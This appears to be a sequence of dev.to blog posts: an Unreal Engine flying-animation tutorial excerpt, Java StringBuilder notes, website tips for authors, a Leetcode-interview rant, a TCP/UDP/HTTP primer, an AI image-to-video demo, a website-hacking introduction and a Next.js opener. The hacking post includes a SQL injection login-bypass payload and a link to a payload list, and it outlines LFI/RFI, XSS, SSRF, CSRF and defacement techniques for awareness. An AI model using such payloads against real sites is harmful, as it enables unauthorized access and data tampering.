4. The animations I downloaded are strictly tied to the skeleton of the Akai character, because they are from the same vendor (Or not??? I'm not sure). To make sure they work on Manny I created an **IK Retargeter**. Inside I selected the IK Rig for Akai as a source and the IK Rig for Manny as a target. This way we can map that the Head from one rig corresponds to the Head of the other rig.

5. Inside that **IK Retargeter** I exported the Flying and Floating animations to dedicated files. These animations work with the Manny skeleton, whereas the original ones work only with the Akai skeleton. 
6. Then I created **Blend Space 1d**, which creates a smooth transition between the 2 animations. Inside I created a variable `Speed`, which controls which animation to choose more. The closer to 0, the more it's Floating; the closer to 600, the more it's Flying.

7. At last I needed to edit the Animation Blueprint for Manny. First I set up a local variable `IsFlying`. Every animation tick it is updated from `MovementComponent.IsFlying`. I'm not sure why it was needed. We could use `MovementComponent.IsFlying` directly everywhere, but I guess it's so that this blueprint has a single source of truth and is more readable.

Now this step I don't quite understand. I disconnected the red line and connected Locomotion directly to the Output Pose. Why?

Then I edited Locomotion state machine with Flying state.

I updated all the transitions to and from the Flying state with a logic using the newly created `IsFlying` variable.

Here is the final result:
{% embed https://youtu.be/PEaOfZol5y0 %}
There were so many files created during the tutorial that I didn't know why they were needed. Everything only made sense after writing it down in this post.
| humberd |
1,878,587 | The StringBuilder and StringBuffer Classes | The StringBuilder and StringBuffer classes are similar to the String class except that the String... | 0 | 2024-06-06T00:03:24 | https://dev.to/paulike/the-stringbuilder-and-stringbuffer-classes-4gdc | java, programming, learning, beginners | The **StringBuilder** and **StringBuffer** classes are similar to the **String** class except that the **String** class is immutable. In general, the **StringBuilder** and **StringBuffer** classes can be used wherever a string is used. **StringBuilder** and **StringBuffer** are more flexible than **String**. You can add, insert, or append new contents into **StringBuilder** and **StringBuffer** objects, whereas the value of a **String** object is fixed once the string is created.
The **StringBuilder** class is similar to **StringBuffer** except that the methods for modifying the buffer in **StringBuffer** are _synchronized_, which means that only one task is allowed to execute the methods. Use **StringBuffer** if the class might be accessed by multiple tasks concurrently, because synchronization is needed in this case to prevent corruption of **StringBuffer**. Using **StringBuilder** is more efficient if it is accessed by just a single task, because no synchronization is needed in this case. The constructors and methods in **StringBuffer** and **StringBuilder** are almost the same. This section covers **StringBuilder**. You can replace **StringBuilder** in all occurrences in this section with **StringBuffer**. The program can compile and run without any other changes.
The **StringBuilder** class has three constructors and more than 30 methods for managing the builder and modifying strings in the builder. You can create an empty string builder or a string builder from a string using the constructors, as shown in Figure below.

## Modifying Strings in the StringBuilder
You can append new contents at the end of a string builder, insert new contents at a specified position in a string builder, and delete or replace characters in a string builder, using the methods listed in Figure below.

The **StringBuilder** class provides several overloaded methods to append **boolean**, **char**, **char[]**, **double**, **float**, **int**, **long**, and **String** into a string builder. For example, the following code appends strings and characters into **stringBuilder** to form a new string, **Welcome to Java**.
```java
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.append("Welcome");
stringBuilder.append(' ');
stringBuilder.append("to");
stringBuilder.append(' ');
stringBuilder.append("Java");
```
The **StringBuilder** class also contains overloaded methods to insert **boolean**, **char**, **char array**, **double**, **float**, **int**, **long**, and **String** into a string builder. Consider the following code:
`stringBuilder.insert(11, "HTML and ");`
Suppose **stringBuilder** contains **Welcome to Java** before the **insert** method is applied. This code inserts **"HTML and "** at position 11 in **stringBuilder** (just before the **J**). The new **stringBuilder** is **Welcome to HTML and Java**.
You can also delete characters from a string in the builder using the two **delete** methods, reverse the string using the **reverse** method, replace characters using the **replace** method, or set a new character in a string using the **setCharAt** method.
For example, suppose **stringBuilder** contains **Welcome to Java** before each of the following methods is applied:
**stringBuilder.delete(8, 11)** changes the builder to **Welcome Java**.
**stringBuilder.deleteCharAt(8)** changes the builder to **Welcome o Java**.
**stringBuilder.reverse()** changes the builder to **avaJ ot emocleW**.
**stringBuilder.replace(11, 15, "HTML")** changes the builder to **Welcome to HTML**.
**stringBuilder.setCharAt(0, 'w')** sets the builder to **welcome to Java**.
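These behaviors can be checked with a small self-contained program. Each call below starts from a fresh builder containing **Welcome to Java**; because every modification method except **setCharAt** returns the builder's reference, the first four calls can be chained directly inside **println**:

```java
public class StringBuilderDemo {
    public static void main(String[] args) {
        // Each operation starts from a fresh builder containing "Welcome to Java"
        System.out.println(new StringBuilder("Welcome to Java").delete(8, 11));           // Welcome Java
        System.out.println(new StringBuilder("Welcome to Java").deleteCharAt(8));         // Welcome o Java
        System.out.println(new StringBuilder("Welcome to Java").reverse());               // avaJ ot emocleW
        System.out.println(new StringBuilder("Welcome to Java").replace(11, 15, "HTML")); // Welcome to HTML

        // setCharAt returns void, so it cannot be chained
        StringBuilder stringBuilder = new StringBuilder("Welcome to Java");
        stringBuilder.setCharAt(0, 'w');
        System.out.println(stringBuilder); // welcome to Java
    }
}
```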
All these modification methods except **setCharAt** do two things:
- Change the contents of the string builder
- Return the reference of the string builder
For example, the following statement
`StringBuilder stringBuilder1 = stringBuilder.reverse();`
reverses the string in the builder and assigns the builder’s reference to **stringBuilder1**. Thus, **stringBuilder** and **stringBuilder1** both point to the same **StringBuilder** object. Recall that a value-returning method can be invoked as a statement, if you are not interested in the return value of the method. In this case, the return value is simply ignored.
For example, in the following statement
`stringBuilder.reverse();`
the return value is ignored.
If a string does not require any change, use **String** rather than **StringBuilder**. Java can perform some optimizations for **String**, such as sharing interned strings.
## The toString, capacity, length, setLength, and charAt Methods
The **StringBuilder** class provides the additional methods for manipulating a string builder and obtaining its properties, as shown in Figure below.

The **capacity()** method returns the current capacity of the string builder. The capacity is the number of characters the string builder is able to store without having to increase its size.
The **length()** method returns the number of characters actually stored in the string builder. The **setLength(newLength)** method sets the length of the string builder. If the **newLength** argument is less than the current length of the string builder, the string builder is truncated to contain exactly the number of characters given by the **newLength** argument. If the **newLength** argument is greater than or equal to the current length, sufficient null characters (**\u0000**) are appended to the string builder so that **length** becomes the **newLength** argument. The **newLength** argument must be greater than or equal to **0**.
The **charAt(index)** method returns the character at a specific **index** in the string builder. The index is **0** based. The first character of a string builder is at index **0**, the next at index **1**, and so on. The **index** argument must be greater than or equal to **0**, and less than the length of the string builder.
The length of the string is always less than or equal to the capacity of the builder. The length is the actual size of the string stored in the builder, and the capacity is the current size of the builder. The builder’s capacity is automatically increased if more characters are added to exceed its capacity. Internally, a string builder is an array of characters, so the builder’s capacity is the size of the array. If the builder’s capacity is exceeded, the array is replaced by a new array. The new array size is **2 * (the previous array size + 1)**.
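The interplay of **length()**, **capacity()**, and **setLength(newLength)** can be sketched in a few lines. The exact numbers assume the JDK's documented default initial capacity of 16 together with the doubling rule described above:

```java
public class CapacityDemo {
    public static void main(String[] args) {
        StringBuilder sb = new StringBuilder();                 // default capacity is 16
        System.out.println(sb.capacity() + ", " + sb.length()); // 16, 0

        sb.append("0123456789ABCDEF");                          // exactly fills the capacity
        System.out.println(sb.capacity() + ", " + sb.length()); // 16, 16

        sb.append('!');                     // exceeds capacity: new size is 2 * (16 + 1) = 34
        System.out.println(sb.capacity() + ", " + sb.length()); // 34, 17

        sb.setLength(5);                    // truncates the stored string
        System.out.println(sb);             // 01234
        System.out.println(sb.charAt(4));   // 4
    }
}
```

Note that **setLength** shrinks the length but leaves the capacity untouched.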
You can use **new StringBuilder(initialCapacity)** to create a **StringBuilder** with a specified initial capacity. By carefully choosing the initial capacity, you can make your program more efficient. If the capacity is always larger than the actual length of the builder, the JVM will never need to reallocate memory for the builder. On the other hand, if the capacity is too large, you will waste memory space. You can use the **trimToSize()** method to reduce the capacity to the actual size. | paulike |
1,879,686 | How to promote your ebooks with your website? | I’m a web developer by trade and a part-time author, so here are a few things that I have done to... | 0 | 2024-06-12T16:34:36 | https://www.csrhymes.com/2024/06/06/promoting-your-ebooks-with-your-website.html | writing, marketing, webdev | ---
title: How to promote your ebooks with your website?
published: true
date: 2024-06-06 00:00:00 UTC
tags: writing,marketing,webdev
canonical_url: https://www.csrhymes.com/2024/06/06/promoting-your-ebooks-with-your-website.html
cover_image: https://www.csrhymes.com/img/books-hero.jpg
---
I’m a web developer by trade and a part-time author, so here are a few things that I have done to help promote my books and ebooks using my website and my tech know how from my day job.
## Build a website
If you don’t have a website, then start by building one. Easy huh?
At the very least, start with a single landing page so you have a presence on the internet when people search for your name or book title. From here you can direct people to where your book is sold and your social media sites so people can be kept up to date.
I built a website, this website in fact, partly to promote my books, partly to promote my work.
This site is built using [Bulma-Clean-Theme](https://github.com/chrisrhymes/bulma-clean-theme), a Jekyll theme that includes product listing pages that you can use to promote your books. If you are interested in development then this may be a way for you to go, but if you aren’t then take a look at site builders or something in between such as WordPress.
The biggest benefit to me of using Jekyll is that I can host it for free with [GitHub pages](https://pages.github.com/) or [Netlify](https://www.netlify.com/), whereas site builders normally come at a monthly cost. There is also no hassle with maintaining a web server as it is a static site. This means the HTML pages are generated into static HTML files and deployed somewhere, in my case GitHub Pages. The way I see it, if you are able to save some money on your website, then you have more to spend elsewhere.
Do what works for you. Pick a solution that is easiest for you to maintain and update, that way, you won’t be put off from making regular updates to your site and it will become part of your routine. Updating little and often, rather than overhauling everything every couple of years, is generally better as return visitors will be encouraged to come back more often and see what is new.
## Register a domain name
Once you have your site up and running you need to register a domain name for your website and point it at your new website. Ensure that you own the domain name and not a third party, such as a developer or an agency.
You also want to ensure that you can update your domain name settings so you can point it somewhere else in future, such as to a different website host, if you want to move your website. You don’t want to be stuck and have to buy a new domain in future and have to start all over again.
Your domain should be concise and easy to type in the address bar. This makes it easier for return visitors to check back at a later date without having to rely on a search engine.
## Create a blog
I’ve found that a good way of getting visitors to your new site is to create a blog. Like this one! Most of the traffic to my website comes from the blog posts. Once people land on your site they can look around and see what else is on your site.
You can always link to your [books](https://www.csrhymes.com/books) from your blog post (see what I did there) which will help visitors to your blog post find your books.
I have heard people say they want a blog, but then I ask them what are they going to write about. They create a single post and then never use it again. I’d suggest writing a list of possible blog post topics and pick the one that you are most excited to write about. If you are excited to write about it then others will be excited to read about it.
Every time you have a new idea for a blog post, ensure you write it down somewhere, otherwise when it actually comes to writing the post, you will be sat in front of an empty screen whilst you try to remember what your great idea was. I use the notes app on my phone to keep my list.
## Add interesting titles and meta description tags to your pages
Spend some time thinking about the title and meta description for your page. These appear in the `<title>` tag and `<meta name="description">` tag in the `<head>` part of the HTML. They are normally used in search engine results, so this is what people who find your site see, and it needs to encourage people to click on your result instead of one of the other links.
Take a look at some best practices for descriptions on the [Google Search documentation](https://developers.google.com/search/docs/appearance/snippet#meta-descriptions).
The title is also used when sharing your link on social media sites. You can go one step further for social media and add additional tags specific to Facebook and X (formerly Twitter), known as [OpenGraph](https://ogp.me/).
I use the Jekyll SEO tag plugin to automatically generate the meta tags for my site, but there are also plugins for WordPress to help you generate these tags.
## Tell Google and other search engines
You may be lucky and a search engine may stumble upon your website, but why not give it a head start and tell search engines it exists. This can be done through [Google Search Console](https://search.google.com/search-console/about). You provide the url of your site and then verify that you own it, either through adding a meta tag to the code, uploading a file, through Google Tag manager or Google Analytics, or by adding a DNS record. Sounds complicated, but it’s definitely worth doing.
Once you have verified you own the site, you can then submit your sitemap. The sitemap tells Google about all of your site’s pages so it knows they exist and can then crawl the pages and then display them in search results.
So what is a [sitemap](https://developers.google.com/search/docs/crawling-indexing/sitemaps/build-sitemap)? It's an XML file in a particular format that provides a list of your website's pages. Jekyll and WordPress have plugins to create a sitemap for you so you don't have to manually write out a load of XML and keep it updated.
Each time you add a new page, such as when a new book page or a new blog post is added, it is added to your sitemap and Google should then index the page next time it reads your sitemap.
## Add your website address to your social media profiles
People looking at your posts and profile will want to know more about you, so provide them with a link in your profile back to your website. This is especially useful if the social media site shows your public profile to search engines. Each link back to your site helps boost its rankings in search engines.
## Share your blog posts on social media
When you have spent so much time writing a blog post, ensure you share it with others. One thing that caught me out, but is probably obvious to most users these days, is that some social sites don’t allow links. Instagram is one example of this. So maybe concentrate on X (formerly Twitter), Facebook, LinkedIn and Threads for sharing links.
## Sharing to other sites
I first got real traction for my blog posts after sharing to another site, who then promoted my blog post for me. In my case, the posts I tend to write are about my day job as a web developer using Laravel and JavaScript. I discovered Laravel News, which allows you to submit your links to their site.
Approved links then get published to a [Community Links](https://laravel-news.com/links) section on their site, but even more importantly, they also share the links on their social media profiles too, as well as sharing the links in a weekly email to their large subscriber base.
Remember to pick sites that are relevant to your subject matter to share to, so don’t submit non Laravel related blog posts to Laravel News.
I am still looking for a site that allows authors to share their blog posts with other authors and readers. If you are aware of one then please let me know!
## Share your blog’s RSS feed
Most blogs allow you to generate an XML feed that can be read by other sites to provide links back to your site. Again, for Jekyll, there is a plugin that lets you create a feed for your posts and WordPress has it as a default feature.
As a developer, I found [dev.to](https://dev.to/chrisrhymes), which allows you to import posts from your website’s feed. The added bonus of this is that it sets a tag telling search engines that the post was originally created on your website. This is called a [canonical link](https://developers.google.com/search/docs/crawling-indexing/consolidate-duplicate-urls#rel-canonical-link-method) and helps tell search engines where the content originally came from.
[Medium.com](https://medium.com/@chrisrhymes) also allows you to import posts from your website's RSS feed, again with a canonical link pointing back to your website.
## Tell people about your site and your books
Last but not least, tell people in real life. I have to admit I am terrible at this. I have found that your website and blog will quietly sit there unused unless you go out of your way to tell people about it.
You should be proud of what you do and want others to read about it.
Add your website address to your business cards, email signature, wherever you can think of.
## Hope that helps
Hopefully there are lots of ideas there to get you started and give your website and blog a boost to help give your books some more visibility.
If you have found this article useful then check out “[How NOT to make a Website](/products/how-not-to-make-a-website)” by C.S. Rhymes for more information on what not to do when building a website. | chrisrhymes |
1,879,787 | I Am So Sick of Leetcode-Style Interviews | I quit my previous job at Robinhood in late November of 2023 mainly for health reasons. I've been in... | 0 | 2024-06-07T02:47:20 | https://nelson.cloud/i-am-so-sick-of-leetcode-style-interviews/ | career, opinion, rant | ---
title: I Am So Sick of Leetcode-Style Interviews
published: true
date: 2024-06-06 00:00:00 UTC
tags: #career, #opinion, #rant
canonical_url: https://nelson.cloud/i-am-so-sick-of-leetcode-style-interviews/
---
I quit my previous job at [Robinhood](https://robinhood.com/) in late November of 2023 mainly for health reasons. I've been in various interviews since then. Things have fallen off for one reason or another but I just gotta say...I am getting so tired of [Leetcode](https://leetcode.com/problemset/)-style interviews, especially since I know they don't reflect the actual responsibilities of software engineering.
It seems like most (if not all) companies do these kinds of interviews simply because that's what all the big companies do, like Google, Facebook/Meta, Amazon, and so on.
I've had very bright engineers tell me that I shouldn't memorize things that I can easily Google. But yet, these interviews quiz me on things that I can easily Google but I may not know off the top of my head. It's absurd.
I don't really have a solution to this problem, I just know it's a problem.
And I'm sick of it.
If you need a Software Engineer with AWS, Kubernetes, and Ruby on Rails experience, and you don't do silly quizzes, feel free to reach out!
* * *
Discussion over at [Hacker News](https://news.ycombinator.com/item?id=40571395) | nelsonfigueroa |
1,878,585 | A Beginner's Guide to Networking Protocols: TCP, UDP, HTTP, and HTTP/3 | Networking can feel like a maze of jargon and acronyms, but understanding the basics is essential for... | 0 | 2024-06-05T23:57:46 | https://dev.to/dev_ojay/a-beginners-guide-to-networking-protocols-tcp-udp-http-and-http3-3pp6 | http, tcp, udp, networking | Networking can feel like a maze of jargon and acronyms, but understanding the basics is essential for anyone new to programming and IT. Two fundamental protocols you'll encounter are [TCP and UDP](https://medium.com/@abhirup.acharya009/understanding-tcp-and-udp-building-blocks-of-connectivity-ec96e208b852), and it's important to know how HTTP uses them. Let's break down these protocols in a simple and easy-to-understand way.
###TCP: The Reliable, Connection-Oriented Protocol
TCP stands for **Transmission Control Protocol.** Think of it as the reliable delivery service of the internet. When you send data using TCP, you’re ensuring it arrives intact and in order. Here’s why TCP is so dependable:
1. **Connection-Oriented**: TCP establishes a connection between the sender and receiver before data transmission begins. Imagine calling someone before having a conversation.
2. **Reliable Delivery**: TCP ensures all packets of data reach their destination. If some packets go astray, TCP retransmits them.
3. **Orderly Data Transfer**: TCP guarantees that packets arrive in the order they were sent. It’s like receiving the pages of a book in the correct sequence.
### How Does TCP Work?
When you send a message using TCP, it goes through a series of steps known as the **TCP handshake**:

1. **SYN**: The sender sends a synchronization packet to the receiver.
2. **SYN-ACK**: The receiver acknowledges this by sending back a synchronization acknowledgment packet.
3. **ACK**: The sender responds with an acknowledgment packet, establishing a connection.
This three-step handshake sets up a reliable channel for data transfer. TCP is like having a polite and precise conversation, ensuring everyone is on the same page before diving into the details.
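The handshake itself is performed by the operating system's TCP stack; application code only sees the established, reliable byte stream. As a rough sketch (the `echoOnce` helper name is invented for this illustration), here is a loopback client/server in Java, where constructing the `Socket` performs the SYN / SYN-ACK / ACK exchange under the hood:

```java
import java.io.*;
import java.net.*;

public class TcpDemo {
    /** Sends one line over a loopback TCP connection and returns what the server echoes. */
    static String echoOnce(String message) throws Exception {
        try (ServerSocket server = new ServerSocket(0)) { // port 0 = pick any free port
            Thread echo = new Thread(() -> {
                // accept() completes the server side of the three-way handshake
                try (Socket client = server.accept();
                     BufferedReader in = new BufferedReader(
                             new InputStreamReader(client.getInputStream()));
                     PrintWriter out = new PrintWriter(client.getOutputStream(), true)) {
                    out.println(in.readLine()); // echo the line back
                } catch (IOException ignored) { }
            });
            echo.start();

            // new Socket(...) performs the handshake before returning
            try (Socket socket = new Socket("localhost", server.getLocalPort());
                 PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
                 BufferedReader in = new BufferedReader(
                         new InputStreamReader(socket.getInputStream()))) {
                out.println(message);
                String reply = in.readLine();
                echo.join();
                return reply;
            }
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(echoOnce("hello over TCP")); // hello over TCP
    }
}
```

Running `main` prints the echoed line, showing that the bytes arrived intact and in order.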
### UDP: The Unreliable, Connectionless Protocol
UDP, or **User Datagram Protocol,** is the "fast and loose" counterpart to TCP. It's used when speed is more critical than reliability. Here’s what makes UDP different:
1. **Connectionless**: UDP sends data without establishing a connection first. It’s like sending a letter without expecting a reply.
2. **Unreliable Delivery**: There’s no guarantee that the data packets will arrive at their destination or in the correct order. It’s a bit like sending postcards into the wind.
3. **Faster Transmission**: Because it skips the connection and error-checking steps, UDP can transmit data faster than TCP.
#### How Does UDP Work?
With UDP, data packets (called datagrams) are sent out into the network with minimal overhead. This makes it ideal for applications where speed is crucial, and some data loss is acceptable. For example:
- **Streaming Media**: If a few video frames are dropped, it’s usually not noticeable.
- **Online Gaming**: Faster data transmission is often more important than perfect delivery.
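A minimal loopback sketch (the `sendOnce` helper is invented for this example) shows how little ceremony UDP needs: no connection setup, just an addressed datagram. Delivery here only looks reliable because both sockets live on the same machine:

```java
import java.net.*;
import java.nio.charset.StandardCharsets;

public class UdpDemo {
    /** Fires a single datagram at a loopback receiver and returns what arrived. */
    static String sendOnce(String message) throws Exception {
        try (DatagramSocket receiver = new DatagramSocket(0); // bind to any free port
             DatagramSocket sender = new DatagramSocket()) {
            byte[] payload = message.getBytes(StandardCharsets.UTF_8);
            // No handshake: the datagram is simply addressed and sent
            sender.send(new DatagramPacket(payload, payload.length,
                    InetAddress.getLoopbackAddress(), receiver.getLocalPort()));

            byte[] buffer = new byte[1024];
            DatagramPacket incoming = new DatagramPacket(buffer, buffer.length);
            receiver.receive(incoming); // blocks until a datagram arrives
            return new String(incoming.getData(), 0, incoming.getLength(),
                    StandardCharsets.UTF_8);
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(sendOnce("fast and loose")); // fast and loose
    }
}
```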
### How Does HTTP Use TCP?
1. **Establishing a Connection**: When you type a URL into your browser, it initiates a TCP connection to the server where the website is hosted.
2. **Request and Response**: Your browser sends an HTTP request (like asking for a web page), and the server responds with the requested data using TCP. This ensures that the data (text, images, videos) arrives reliably and in the correct order.
3. **Closing the Connection**: Once the data transfer is complete, the TCP connection is closed.
Using TCP for HTTP ensures that the web pages you request are delivered accurately and completely, making your browsing experience smooth and reliable.
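To see that HTTP really is just structured text flowing over a TCP stream, here is a small sketch (the `fetchStatusLine` helper and the hard-coded response are illustrative only) in which a thread serves one canned HTTP response and a raw socket fetches it:

```java
import java.io.*;
import java.net.*;

public class HttpOverTcp {
    /** Serves one hard-coded HTTP response locally and returns the status line a raw client reads. */
    static String fetchStatusLine() throws Exception {
        try (ServerSocket server = new ServerSocket(0)) {
            Thread handler = new Thread(() -> {
                try (Socket client = server.accept();
                     BufferedReader in = new BufferedReader(
                             new InputStreamReader(client.getInputStream()));
                     PrintWriter out = new PrintWriter(client.getOutputStream(), true)) {
                    while (!in.readLine().isEmpty()) { } // consume request headers
                    out.print("HTTP/1.1 200 OK\r\n\r\nHello\r\n");
                    out.flush();
                } catch (IOException ignored) { }
            });
            handler.start();

            try (Socket socket = new Socket("localhost", server.getLocalPort());
                 PrintWriter out = new PrintWriter(socket.getOutputStream(), true);
                 BufferedReader in = new BufferedReader(
                         new InputStreamReader(socket.getInputStream()))) {
                // An HTTP request is just lines of text written to the TCP stream
                out.print("GET / HTTP/1.1\r\nHost: localhost\r\n\r\n");
                out.flush();
                String statusLine = in.readLine();
                handler.join();
                return statusLine;
            }
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println(fetchStatusLine()); // HTTP/1.1 200 OK
    }
}
```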
###How Does HTTP Use UDP in HTTP/3?
[HTTP/3](https://www.cloudflare.com/learning/performance/what-is-http3/) is the latest version of the HTTP protocol, using QUIC (Quick UDP Internet Connections), which is built on top of UDP. This improves performance and speed, especially in our modern age where users frequently switch between networks on their smartphones.
Here's how it works:
1. **Faster Connection Establishment:** QUIC, and by extension HTTP/3, reduces the time needed to establish a connection compared to TCP. This makes web pages load faster.
2. **Reliability and Order:** Despite being built on UDP, QUIC incorporates mechanisms for ensuring data reliability and ordered delivery, similar to TCP but with lower latency.
3. **Improved Performance:** HTTP/3 can handle packet loss more efficiently and maintain better performance on unstable networks.
By leveraging UDP through QUIC, HTTP/3 aims to enhance the speed and efficiency of web communication without sacrificing reliability.
### Wrapping Up
Understanding TCP and UDP, and how HTTP and HTTP/3 use these protocols, is a crucial step in grasping the fundamentals of networking. Remember:
- **TCP** ensures data arrives intact and in order.
- **UDP** prioritizes speed over reliability.
- **HTTP** leverages TCP to ensure web pages are delivered reliably.
- **HTTP/3** leverages QUIC to ensure fast connection and reliability.
As you learn more about networking and programming, these ideas will help you understand more advanced topics.
| dev_ojay |
1,878,584 | Dev.to Frontend Challenge: Take me to the Beach | Dev.to Frontend Challenge June This project it will be used for the dev.to frontend... | 0 | 2024-06-05T23:55:33 | https://dev.to/kevin-uehara/devto-frontend-challenge-take-me-to-the-beach-4agn | frontendchallenge, braziliandevs, javascript, webdev | ## Dev.to Frontend Challenge June
This project will be used for the dev.to frontend challenge. I chose the second challenge: the beaches.
Just Access the Project: [Hosted Project](https://devto-frontend-challenge-june.vercel.app/)
## Github Repository
[Repository](https://github.com/kevinuehara/devto-frontend-challenge-june)

## How it works?
I'm using the Vanilla Javascript and the mock API to provide the images and the lat/long. And with the coordinates I'm using Leaflet to display the map location of the beach.
I'm not using NPM/Yarn/PNPM as a dependency package manager. This is a simple project that uses vanilla JavaScript for everything, replacing and manipulating the DOM with plain JavaScript functions.
All styles live in a single CSS file.
For the fonts I'm using the Google Fonts.
It's also responsive, with good accessibility, performance and SEO scores!
## How to run?
Just use the Live Server VS Code extension. Right-click the HTML file and click on `Open Live Server`. Access `http://localhost:5501/index.html`.
This project is hosted on Vercel. Just access the `https://devto-frontend-challenge-june.vercel.app/`
## Light House Metrics

| kevin-uehara |
1,878,583 | Day 964 : Energy Boost | liner notes: Professional : Had a couple of meetings. Responded to community questions. Rest of the... | 0 | 2024-06-05T23:53:11 | https://dev.to/dwane/day-964-energy-boost-2hp8 | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Had a couple of meetings. Responded to community questions. Rest of the day, I worked on the library I published yesterday and got it working in a demo application. Pretty good day.
- Personal : Last night, I went through some tracks for the radio show. Worked on my side project. Didn't get much done. CSS was kicking my butt! haha I'm almost there. Trying to get the selection of an element previous to the active one. Got tired and went to sleep.

Don't know what it is. Think I'm sick. Got a sore throat and a bad cough every once in a while and just been super tired after work. Been getting started on my side project later than normal. I did set up my new AR glasses so that's pretty cool. There's some more apps I want to download to test some things out, but so far so good. I'm tired! Need an energy boost. Going to go through some tracks on Bandcamp to purchase. Work on the radio show. See if I can get this CSS worked out. I think I'm so close. I'm learning a lot though. Then call it a night.
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube dE3gl0afQlw %} | dwane |
1,875,922 | 🎬 From image to text data... to image...to movie clip. | 📰 About I previously wrote an article that showed, how, for totally free of charge, and... | 27,429 | 2024-06-05T23:51:02 | https://dev.to/adriens/from-image-to-text-data-to-imageto-movie-clip-10ci | showdev, datascience, ai | ## 📰 About
I previously wrote an article that showed how, **completely free of charge and with 100% open source software,** it is possible to analyze photos and produce textual analysis:
{% embed https://dev.to/adriens/disaster-reporting-wopen-source-llavaai-for-photo-analysis-4k4c %}
👉 Today, I'll show, what can be achieved on top of these textual analysis.
## 📜 What we'll do
This time, we will enrich the previous pipeline with the following workflow:
1. **🎨 `text2img`**: inject text analysis into an image with https://ideogram.ai
2. **🎬 `img2video`** : Put resulting image into [Gen-2 by Runway](https://research.runwayml.com/gen2) to get a movie clip with
3. 🎙️ Prepare a small **storytelling**
4. 🎶 Select a **soundtrack**
5. 🎛️ Put all the stuff into a single **short movie clip**
Enough talk, here is the resulting movie clip.
## 🎞️ Demo
{% youtube vb66lFI1U2Q %} | adriens |
1,878,582 | INTRODUCTION TO WEBSITE HACKING | SQL Injection SQL Injection is a malicious web vulnerability, a dark art that allows... | 0 | 2024-06-05T23:47:14 | https://dev.to/sam15x6/introduction-to-website-hacking-4g48 | hacker, sql, python, webdev | ## SQL Injection
**SQL Injection** is a malicious web vulnerability, a dark art that allows attackers to manipulate the very heart of your application – its database. By interfering with the queries your application makes, attackers can view, modify, or even delete your precious data. And if that's not enough, they might even be able to take full control of your application, leaving you with a smoldering mess.
Comments in SQL programming, those quiet little notes developers leave in the code, can become weapons in the hands of these attackers. Ignored by the compiler or interpreter, comments usually go unnoticed, but in the wrong hands, they can be used to exploit vulnerabilities and wreak havoc.
Take a look at this innocent-looking code snippet:
```sql
SELECT * FROM users WHERE username = 'admin'-- ' AND password = 'haha';
```
Here, the attacker has added a comment `--` to bypass the password check, effectively granting them access with just the username. It's a simple yet powerful technique, and there are many more like it in the SQL Injection Payload List on GitHub. A treasure trove of malicious techniques awaits at: https://github.com/payloadbox/sql-injection-payload-list
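To make the mechanics concrete, here is a small JavaScript sketch of the vulnerable pattern. The `buildLoginQuery` helper is hypothetical, purely illustrative of naive string concatenation, not any real database driver API:

```javascript
// Vulnerable pattern: building SQL by concatenating raw user input.
function buildLoginQuery(username, password) {
  return (
    "SELECT * FROM users WHERE username = '" + username +
    "' AND password = '" + password + "';"
  );
}

// The attacker supplies a username that closes the quote and starts a comment.
const injected = buildLoginQuery("admin'-- ", "anything");
console.log(injected);
// SELECT * FROM users WHERE username = 'admin'-- ' AND password = 'anything';
// Everything after `--` is ignored by the database, so the password
// check never executes and the attacker logs in as admin.
```

The standard defense is to never build queries this way: parameterized (prepared) statements keep user input strictly as data, so the `--` sequence can no longer change the query's structure.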
## Local File Inclusion (LFI) & Remote File Inclusion (RFI)
Now, let's move on to another devious trick up an attacker's sleeve: Local File Inclusion (LFI). With LFI, attackers trick the server into including local files stored on it. This gives them access to sensitive files and sometimes even lets them execute their own code. It's like giving a burglar the keys to your house and showing them where you hide your valuables.
Websites that dynamically include files based on user input are particularly vulnerable to LFI attacks, especially if they don't sanitize and validate that input properly. Content management systems, forums, and web applications with file inclusion features are common targets for these malicious intruders.
But wait, there's more! Remote File Inclusion (RFI) takes it a step further. With RFI, attackers include files from external sources, executing malicious code hosted on their own servers. It's like letting the burglar bring their own tools to break into your safe.
## The Many Faces of Website Defacement
Website defacement, the act of altering a website's content or appearance without authorization, is a common goal of attackers. Here are some of the ways they can achieve this:
1. **Admin Login Pages:** Locating the admin login portal and gaining unauthorized access to alter website content.
2. **LFI/RFI:** Including and executing local or remote files to inject malicious scripts or replace files, ultimately changing website content.
3. **SQL Injection:** Injecting malicious SQL commands to modify or delete database entries, thereby altering website content.
4. **Cross-Site Scripting (XSS):** Injecting malicious scripts into web pages viewed by users, displaying altered content or redirecting them to malicious pages.
5. **Server-Side Request Forgery (SSRF):** Exploiting internal services and making the server perform unauthorized requests to gain control and modify website content.
6. **DDoS Attack:** Overloading a website with traffic to make it unavailable, indirectly affecting site functionality.
And there's more where that came from. Server-Side Template Injection (SSTI) and Directory Traversal are just a couple of other tricks attackers use to manipulate website content and execute server-side commands.
## Attacks Targeting Visitors, Not Websites
Not all attacks are aimed at defacing websites. Some target the visitors themselves:
1. **DNS Spoofing (DNS Cache Poisoning):** Altering DNS records to redirect unsuspecting users from a legitimate site to a malicious one.
2. **Cross-Site Request Forgery (CSRF):** Tricking authenticated users into performing actions on a web application without their consent, such as transferring money to an attacker's account.
The world of website hacking is a treacherous one, full of pitfalls and dangers. But fear not, for knowledge is power. By understanding these threats, we can fortify our defenses and keep our digital kingdoms safe.
And if you're feeling adventurous, you can even set up your own vulnerable website to practice your hacking skills. Just remember, with great power comes great responsibility. Use these skills wisely, young padawan. | sam15x6 |
1,878,581 | What Is Next Js And Why Should You Use It In 2024? | INTRODUCTION One of the top benefits of learning what is Next.js, is the knowledge of how flexible... | 0 | 2024-06-05T23:45:08 | https://dev.to/basimghouri/what-is-next-js-and-why-should-you-use-it-in-2024-5ei9 | javascript, nextjs, beginners, webdev | **INTRODUCTION**
One of the top benefits of learning what Next.js is lies in how flexible you can become in building for, and adapting to, online reality. As seasoned Next.js developers, we recognize the immense value in mastering this framework: its most compelling advantage is the unparalleled flexibility that empowers us to craft and seamlessly adapt to the dynamic landscape of the online realm.
